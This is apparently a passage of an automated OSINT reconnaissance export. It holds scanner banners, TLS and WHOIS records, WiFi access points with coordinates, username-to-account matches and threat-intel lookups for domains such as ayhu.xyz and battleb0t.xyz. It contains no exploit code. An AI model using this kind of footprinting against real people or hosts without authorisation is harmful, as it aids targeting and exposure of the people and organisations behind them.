"response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:8443 | 188.114.97.1 |
| 2023-05-12 02:44:12 | Web Technology | No | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Nginx | kekw.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Lichtensteiner (Net ID: 00:01:E3:57:D3:4C) | 50.1188, 8.6843 |
| 2023-05-12 02:54:51 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.74.170.74:80 | 34.74.170.74 |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c596497ac4b8134-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Superonline_WiFi_7320 (Net ID: 00:02:61:5C:85:FF) | 40.2024, 29.0398 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 226.30.196.104.bc.googleusercontent.com | 104.196.30.226 |
| 2023-05-12 02:44:17 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Germany | Frankfurt am Main, Hesse, 60306, Germany, Europe |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:E5:E0:81) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:09:F8:70) | 37.780462,-122.390564 |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.171): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0031.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:A4:B5:6D) | 50.8897, 6.0563 |
| 2023-05-12 02:44:06 | Domain Whois | No | Whois | 14 | 0 | 1 | 0 | None | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| ayhu.xyz |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 90 CW @ 18} | https://funny.battleb0t.xyz/images/withat_4.jpg |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.120 | 35.229.48.116 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.32): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-110-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-110-154.github.com |
| 2023-05-12 02:54:30 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Server: nginx
Date: <REDACTED>
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"64217dc5-156"
Content-Encoding: gzip
| 64.226.81.43 |
| 2023-05-12 02:44:09 | Co-Hosted Site | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 02:45:02 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 2606:50c0:8002::153 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ee2a62d9a2306-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=ayhu | ayhu |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:12:BF:3D:DD:C5) | 40.2024, 29.0398 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | GitHub (Category: coding)
https://github.com/ayshoo | ayshoo |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:8080 | 188.114.96.0/24 |
| 2023-05-12 03:31:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@godaddy.com | Domain Name: 001VIET.COM
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-10-01T07:27:47Z
Creation Date: 2022-03-31T20:18:54Z
Registry Expiry Date: 2024-03-31T20:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 001viet.com
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-03-31T15:18:54Z
Creation Date: 2022-03-31T15:18:54Z
Registrar Registration Expiration Date: 2024-03-31T15:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:10 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 172.67.135.9 |
| 2023-05-12 02:58:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'34.74.170.74', u'34.74.170.74', u'184.50.50.164'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.automox.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.automox.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:80"\n "34.74.170.74:443"\n "184.50.50.164:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCC02.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d30_IESQMMUTEX_0_519"\n "IsoScope_d30_ConnHashTable<3376>_HashTable_Mutex"\n "IsoScope_d30_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3376"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d30_IESQMMUTEX_0_303"\n "IsoScope_d30_IE_EarlyTabStart_0xa8c_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d30_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabCC01.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpwww.automox.com" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "_D69E16F9-2DF2-11ED-B0FF-080027103F92_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002536]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "D2A4F93EC4F5B9C4C799775424B5AD98" has type "data"- Location: 